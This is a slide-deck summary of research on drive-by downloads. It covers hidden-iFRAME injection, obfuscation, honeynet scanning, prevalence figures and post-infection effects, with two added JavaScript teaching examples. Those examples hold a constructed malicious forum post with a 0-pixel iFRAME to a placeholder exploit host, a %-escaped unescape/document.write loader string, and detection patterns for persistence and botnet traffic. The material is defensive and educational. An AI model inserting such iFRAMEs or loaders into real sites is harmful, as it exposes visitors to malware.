Upload: alfred-burke

Post on 11-Jan-2016

Page 1

All Your iFRAMEs Point to Us

Mike Burry

Page 2

Drive-by downloads

•Malicious code (typically JavaScript)

•Downloaded without user interaction (automatic), just by visiting the malicious URL.

•Executable(s) downloaded to the client machine and installed without the visitor's knowledge

•Targets unpatched, vulnerable browsers or plugins

•Traditional perimeter defenses (firewalls, proxies, dynamic addressing) are largely powerless: the attack is pull-based, so the victim's own browser initiates every connection and the traffic looks like ordinary outbound HTTP.

Page 3

‘Malicious’ websites are typically victims too

•Vulnerable web applications (e.g. phpBB2) give an attacker access to the web server and the O/S underneath it

  • New content is injected via invisible HTML components (0-pixel iFRAME)

•Visitor-contributed content (forums, blogs) is very dangerous: if it is not sanitized, injecting an iFRAME needs no web server compromise at all

  • ALWAYS sanitize user input!

•The malicious content itself is typically hosted elsewhere (the distribution site); the compromised page only points to it

Page 4

Infection Process

•Visit malicious URL

•Initial exploit script (via iFRAME) downloaded

•Script targets a browser or plugin vulnerability

•Exploit results in the browser connecting to a malware distribution site (typically on a different host) to retrieve executable(s)

•Executable is installed on the infected system

Page 5

Avoiding Detection

•Hidden from view on the website (iFRAME)

•JavaScript obfuscation

•Multiple redirections before contacting the malware distribution site
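The following is an added example, not code from the slides or from the paper they summarize. It ties slide 3 (an unsanitized forum post injecting a 0-pixel iFRAME, and why "ALWAYS sanitize user input" stops it) to slide 5 (hidden iFRAMEs and JavaScript obfuscation as the detection-avoidance tricks a scanner must look for). It renders a constructed malicious post through a vulnerable and a hardened renderer, then runs a small static scanner over the resulting HTML. The host names, the sample post and the obfuscated loader are all constructed for illustration; the scanner is a deliberately simple regex pass, not a full HTML parser.

```javascript
// Added example (not from the slides): an unsanitized forum post smuggling a
// 0-pixel iFRAME into a legitimate page, and a static scanner that flags hidden
// iFRAMEs and obfuscation tell-tales in served HTML. Runs under Node.js with no
// dependencies. All HTML below is constructed; evil.example is a placeholder host.

const pageTemplate = (postHtml) =>
  `<html><body><h1>Forum</h1><div class="post">${postHtml}</div></body></html>`;

// Vulnerable renderer: user text is concatenated into the page as raw markup.
function renderPostUnsafe(userText) {
  return pageTemplate(userText);
}

// Hardened renderer: HTML metacharacters are escaped, so a submitted
// <iframe> tag is displayed as text instead of being parsed as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderPostSafe(userText) {
  return pageTemplate(escapeHtml(userText));
}

// Parse the attributes of one tag into an object with lowercase keys.
function parseAttrs(tagBody) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    attrs[m[1].toLowerCase()] = (m[2] ?? m[3] ?? m[4]).trim();
  }
  return attrs;
}

// The "hidden from view" shapes slide 5 refers to: zero size, display:none,
// visibility:hidden, or positioned far off-screen.
function isHiddenIframe(attrs) {
  const zero = (v) => v !== undefined && /^0(px)?$/.test(v);
  const style = (attrs.style || '').toLowerCase();
  return zero(attrs.width) || zero(attrs.height) ||
    /display\s*:\s*none/.test(style) ||
    /visibility\s*:\s*hidden/.test(style) ||
    /(left|top)\s*:\s*-\d{3,}/.test(style);
}

// Return the src of every hidden iFRAME in the document.
function findHiddenIframes(html) {
  const found = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    if (isHiddenIframe(attrs)) found.push(attrs.src || '(no src)');
  }
  return found;
}

// Flag inline scripts that pair runtime code construction with decoding of long
// escaped strings: the usual shape of an obfuscated exploit loader.
function findObfuscatedScripts(html) {
  const hits = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const body = m[1];
    const reasons = [];
    if (/\b(eval|document\.write|Function)\s*\(/.test(body)) reasons.push('dynamic code execution');
    if (/\b(unescape|String\.fromCharCode|atob)\s*\(/.test(body)) reasons.push('runtime decoding');
    if (/(%[0-9a-f]{2}){8,}|(\\x[0-9a-f]{2}){8,}/i.test(body)) reasons.push('long escaped string');
    if (reasons.length >= 2) hits.push(reasons);
  }
  return hits;
}

// Constructed malicious post: friendly text plus a 0-pixel iFRAME to an exploit page.
const EVIL_POST =
  'Nice thread! <iframe src="http://evil.example/x.html" width="0" height="0" frameborder="0"></iframe>';

// Constructed obfuscated loader: the iFRAME tag is built from a %-escaped string at runtime.
const OBFUSCATED_PAGE =
  '<html><script>var s=unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%64%69%73%74");document.write(s);</script></html>';

function demo() {
  return {
    unsafe: findHiddenIframes(renderPostUnsafe(EVIL_POST)),   // ['http://evil.example/x.html']
    safe: findHiddenIframes(renderPostSafe(EVIL_POST)),       // []
    obfuscated: findObfuscatedScripts(OBFUSCATED_PAGE),       // one hit with three reasons
  };
}
console.log(JSON.stringify(demo(), null, 2));
```

The unsafe renderer produces a page the scanner flags; the escaped version contains no iFRAME element at all, which is the whole point of output encoding. The obfuscation check requires two independent signals before flagging, since `document.write` on its own is common in benign pages; in practice a scanner of this kind only ranks candidates, and the verdict comes from executing the page in an instrumented browser as the next slides describe.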

Page 6

Scanning/Verification Process

•Large honeynet simultaneously runs many MS Windows VMs

  • Each running an unpatched Internet Explorer instance

•Combination of:

  • Execution-based heuristics: run each URL for ~2 minutes and monitor the file system, processes and registry

  • Anti-virus engines check the HTTP responses

  • A score is assigned to every URL and a threshold is set

Page 7

How Common are D-BD’s (drive-by downloads)?

Data collection period: Jan - Oct 2007 (10 months)

Total URLs checked (in-depth)    66,534,330
Unique suspicious URLs            3,385,889
Unique malicious URLs             3,417,590
Unique malicious sites              181,699
Unique distribution sites             9,340

*Malicious: meets the threshold AND at least one incoming HTTP response is marked as malicious by at least one anti-virus scanner

*Suspicious: meets the threshold BUT none of the incoming HTTP responses are marked as malicious by any anti-virus scanner

Approx. 1 million URLs checked daily; approx. 25k flagged as malicious

Page 8

Potential Impact on End-User

•Nearly 1.3% of Google’s search queries return at least one malicious result

  • About 0.6% of the top million URLs that appeared most frequently in Google's search results led to exposure of malicious activity at some point.

•“Gray content” (adult) sites carry a higher risk (0.6+% vs 0.2-0.35%), i.e. 2-3 times more common.

•The other functional categories of the Web show a roughly equal distribution

  • “Safe browsing” helps, but is not an effective safeguard

Page 9

Geography of Malicious Sites

•96% of landing sites in China point to malware distribution servers located in the same country

•The remaining ~10% of distribution and landing sites (outside the top five countries below) are spread across the globe

Distribution site hosting country   % of all distribution sites   Landing site hosting country   % of all landing sites
China                               67%                           China                          64.4%
US                                  15%                           US                             15.6%
Russia                               4%                            Russia                         5.6%
Malaysia                            2%                            Korea                          2%
Korea                               2%                            Germany                        2%

Page 10

Web Server Software

•A significant number of landing sites are running outdated software with well-known vulnerabilities.

  • 38% of Apache servers had known vulnerabilities

  • 40% of servers with PHP support had known vulnerabilities

Page 11

Ad Syndication

•The majority of Web advertisements are distributed in the form of 3rd-party content (ad syndication)

•A web page is only as secure as its weakest component

  • A “secure” site with insecure ads is insecure

•2% of landing pages delivered malware via ads

  • 75% of these landing pages use multiple levels of syndication

•Ads appear on thousands of websites instantaneously

  • A very easy way to push content to a large visitor base without compromising any web server: large impact, but short-lived.

Page 12

Distribution Networks

•Distribution Network = all the landing sites which point to a single distribution site

•The vast majority were subdomains on free hosting services or short-lived domains created in bulk

•Networks range in size from 1 to over 21,000 landing sites

  • 45% have only 1 landing site

  • Is this to avoid detection?

Page 13

Distribution Networks (cont.)

•42% deliver only a single malware binary, while 3% had over 100.

•80% of networks share at least 1 landing page

  • Several landing pages have multiple iFRAMEs to different distribution sites

  • Easy targets?

Page 14

Post Infection Impact

•On average, 8 downloads occur

  • Up to 60 downloads have been observed

•Increase in the number of running processes on the VM

•58% of landing pages caused registry changes

Category   BHO   Preferences   Security   Startup
URL %      7%    24%           36%        51%

*BHO: Browser Helper Object (privileged state)
*Preferences: Homepage / search engine / name server changes
*Security: Firewall settings / disable automatic updates
*Startup: Persist across reboots
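The following is an added example and is not code from the slides, nor from the honeynet Google actually ran. It puts slides 6 and 7 (score each URL's ~2-minute VM run, apply a threshold, combine with anti-virus results to label it malicious or suspicious) together with the registry-change categories of slide 14 and the port buckets of slide 15. The weights, the threshold and the two sample reports are my own assumptions; the registry key paths are the standard Windows locations for BHO registration, IE start/search page, DNS name server, firewall policy, automatic updates and Run keys.

```javascript
// Added example (not from the slides or Google's honeynet): a scorer in the
// shape of the verification process on slides 6-7, applied to a constructed
// sandbox report, using the registry categories of slide 14 and the port
// buckets of slide 15. Weights, threshold and reports are assumptions.
// Runs under Node.js with no dependencies.

// Map a changed registry key to one of slide 14's categories, or null.
// Paths are the standard Windows locations for each category.
const REGISTRY_CATEGORIES = [
  ['BHO',         /\\Explorer\\Browser Helper Objects\\/i],
  ['Preferences', /\\Internet Explorer\\Main\\(Start Page|Search Page|Default_Page_URL)$/i],
  ['Preferences', /\\Services\\Tcpip\\Parameters(\\Interfaces\\[^\\]+)?\\NameServer$/i],
  ['Security',    /\\SharedAccess\\Parameters\\FirewallPolicy\\/i],
  ['Security',    /\\WindowsUpdate\\(AU\\NoAutoUpdate|Auto Update\\AUOptions)$/i],
  ['Startup',     /\\Windows\\CurrentVersion\\(Run|RunOnce|RunServices)(\\|$)/i],
];

function categorizeRegistryKey(key) {
  for (const [cat, re] of REGISTRY_CATEGORIES) if (re.test(key)) return cat;
  return null;
}

// Bucket a destination port the way slide 15 buckets post-infection traffic.
function classifyPort(port) {
  if (port === 80 || port === 8080) return 'HTTP';
  if (port >= 6660 && port <= 7001) return 'IRC';
  if (port === 21) return 'FTP';
  if (port === 25) return 'Mail';
  if (port === 1900) return 'UPnP';
  return 'Other';
}

const THRESHOLD = 5;  // assumed; the slides only say that a threshold is set

// Score one ~2 minute VM run from its file-system, process and registry
// activity (assumed weights), then apply slide 7's two definitions.
function scoreReport(report) {
  const categories = {};
  for (const key of report.registryChanges) {
    const c = categorizeRegistryKey(key);
    if (c) categories[c] = (categories[c] || 0) + 1;
  }
  const ports = {};
  for (const p of report.outboundPorts) {
    const c = classifyPort(p);
    ports[c] = (ports[c] || 0) + 1;
  }
  let score = 0;
  score += 2 * report.newProcesses;                          // spawned processes
  score += report.filesWritten.filter((f) => /\.(exe|dll|scr)$/i.test(f)).length;
  score += 1 * (categories.Preferences || 0);
  score += 2 * (categories.BHO || 0);                        // privileged browser extension
  score += 3 * (categories.Security || 0);                   // firewall / update tampering
  score += 3 * (categories.Startup || 0);                    // persistence across reboots
  score += 3 * (ports.IRC || 0);                             // likely botnet join

  const meetsThreshold = score >= THRESHOLD;
  const avFlagged = report.httpResponsesAvHits > 0;
  // malicious = threshold AND an AV hit on an HTTP response; suspicious = threshold, no AV hit
  let verdict = 'benign';
  if (meetsThreshold && avFlagged) verdict = 'malicious';
  else if (meetsThreshold) verdict = 'suspicious';
  return { score, verdict, categories, ports };
}

// Constructed report: the page drops a binary, registers it at startup,
// disables the firewall, changes the IE start page and joins an IRC channel.
const SAMPLE_REPORT = {
  newProcesses: 2,
  filesWritten: ['C:\\WINDOWS\\system32\\svch0st.exe', 'C:\\Temp\\log.txt'],
  registryChanges: [
    'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svch0st',
    'HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\EnableFirewall',
    'HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page',
  ],
  outboundPorts: [80, 80, 6667],
  httpResponsesAvHits: 1,
};

// Constructed report for a benign page: one cached file, nothing else.
const BENIGN_REPORT = {
  newProcesses: 0, filesWritten: ['C:\\Temp\\page.htm'], registryChanges: [],
  outboundPorts: [80], httpResponsesAvHits: 0,
};

console.log(JSON.stringify(scoreReport(SAMPLE_REPORT)));   // score 15, verdict "malicious"
console.log(JSON.stringify(scoreReport(BENIGN_REPORT)));   // score 0, verdict "benign"
```

The same sample report with `httpResponsesAvHits` set to 0 comes out as "suspicious": the behaviour is unchanged, only the AV corroboration is missing, which is exactly the distinction slide 7's two definitions draw, and why slide 16's low AV detection rates matter for how many real infections land in the "suspicious" bucket.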

Page 15

Post Infection Impact (cont.)

•Network activity

  • 87%: HTTP (ports 80 & 8080), due to binary downloads

  • 8.3%: IRC (ports 6660 - 7001), accounting for more than 50% of all non-HTTP traffic. Most likely joining a botnet.

  • < 1%: FTP (21), UPnP (1900), Mail (25)

  • 2.25%: all other ports combined

Page 16

Anti-Virus Detection Rates

•The best AV engine tested (out of 3) successfully detected an average of 70% of the malware.

•The worst AV engine detected approx. 25%.